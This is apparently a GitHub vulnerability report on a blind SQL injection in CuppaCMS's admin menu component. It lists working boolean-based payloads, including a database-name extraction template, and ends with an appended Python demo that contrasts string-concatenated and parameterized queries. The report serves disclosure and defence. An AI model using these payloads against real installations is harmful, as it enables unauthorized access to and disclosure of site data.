SQL injection vulnerability exists in CuppaCMS /administrator/components/menu/ #14

Open
truonghuuphuc opened this issue Jan 4, 2022 · 0 comments

truonghuuphuc commented Jan 4, 2022

  • VULNERABLE: SQL injection vulnerability exists in CuppaCMS. An attacker can inject a query in
    “/administrator/components/menu/” via the ‘path=component/menu/&menu_filter=3’ parameters.
  • Date: 4/1/2022
  • Exploit Author: Trương Hữu Phúc
  • Contact me:
  • Github: https://github.com/truonghuuphuc
  • Email: phuctruong2k@gmail.com
  • Product: CuppaCMS
  • Description: The vulnerability is present in “/administrator/components/menu/” and can be
    exploited through a POST request via the ‘path=component/menu/&menu_filter=3’ parameters.
  • Impact: Allows an attacker to inject queries and to access and disclose all data on the system.
  • Suggestions: User input should be filtered; use escaping and parameterized queries.
  • Payload Boolean true: path=component/menu/&menu_filter=3' and '3'='3
  • Payload Boolean false: path=component/menu/&menu_filter=3' and '4'='3
  • Payload exploit example: path=component/menu/&menu_filter=3' and
    if(SUBSTRING(database(),index,1)='character','1','0')='1
  • Payload exploit: path=component/menu/&menu_filter=3' and
    if(SUBSTRING(database(),1,1)='c','1','0')='1
  • Proof of concept (POC):
  • Payload Boolean true: path=component/menu/&menu_filter=3' and '3'='3
  • Request and Response:
    true
  • Payload Boolean false: path=component/menu/&menu_filter=3' and '4'='3
  • Request and Response:
    false
  • Exploit:
    poc
    database
  • Report:
    Report.pdf
@truonghuuphuc truonghuuphuc changed the title SQL injection vulnerability exists in CuppaCMS. An attacker can inject query in “/administrator/components/menu/" via the ‘path=component/menu/&menu_filter=3’ parameters. SQL injection vulnerability exists in CuppaCMS part 2 Jan 10, 2022
@truonghuuphuc truonghuuphuc changed the title SQL injection vulnerability exists in CuppaCMS part 2 SQL injection vulnerability exists in CuppaCMS /administrator/components/menu/ Jan 13, 2022
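The parameterized-query suggestion in the report, as an added example that is not part of the original issue and is not CuppaCMS code: it runs the report's two boolean payloads against a concatenated query and against a bound one. The table and column names, the sample rows and the function names are assumptions, and SQLite stands in for the CMS's database.

```python
import sqlite3

# The two boolean payload values quoted in the report for menu_filter.
TRUE_PAYLOAD = "3' and '3'='3"
FALSE_PAYLOAD = "3' and '4'='3"


def make_db():
    # Constructed sample data; schema names are assumptions, not CuppaCMS's.
    db = sqlite3.connect(":memory:")
    db.execute("CREATE TABLE menu_items (id INTEGER PRIMARY KEY, menu_id TEXT, title TEXT)")
    db.executemany(
        "INSERT INTO menu_items (menu_id, title) VALUES (?, ?)",
        [("3", "Home"), ("3", "About"), ("4", "Admin tools")],
    )
    return db


def list_items_concat(db, menu_filter):
    # Vulnerable pattern: the request value is spliced into the SQL text,
    # so a quote in it ends the string literal and the rest is parsed as SQL.
    sql = "SELECT title FROM menu_items WHERE menu_id = '" + menu_filter + "' ORDER BY id"
    return [row[0] for row in db.execute(sql)]


def list_items_bound(db, menu_filter):
    # Hardened: the value is bound as data and is never parsed as SQL.
    sql = "SELECT title FROM menu_items WHERE menu_id = ? ORDER BY id"
    return [row[0] for row in db.execute(sql, (menu_filter,))]


def list_items_validated(db, menu_filter):
    # Input filtering on top of binding: accept only a plain decimal id.
    if not (menu_filter.isascii() and menu_filter.isdigit()):
        raise ValueError("menu_filter must be a numeric id")
    return list_items_bound(db, menu_filter)


def response_differs(query_fn, db):
    # A true/false difference in the response is the signal the report relies on.
    return query_fn(db, TRUE_PAYLOAD) != query_fn(db, FALSE_PAYLOAD)


if __name__ == "__main__":
    db = make_db()
    print("concatenated query leaks a boolean:", response_differs(list_items_concat, db))
    print("bound query leaks a boolean:", response_differs(list_items_bound, db))
```

With the bound query both payloads are compared as literal strings against `menu_id`, so the response no longer changes with the injected condition.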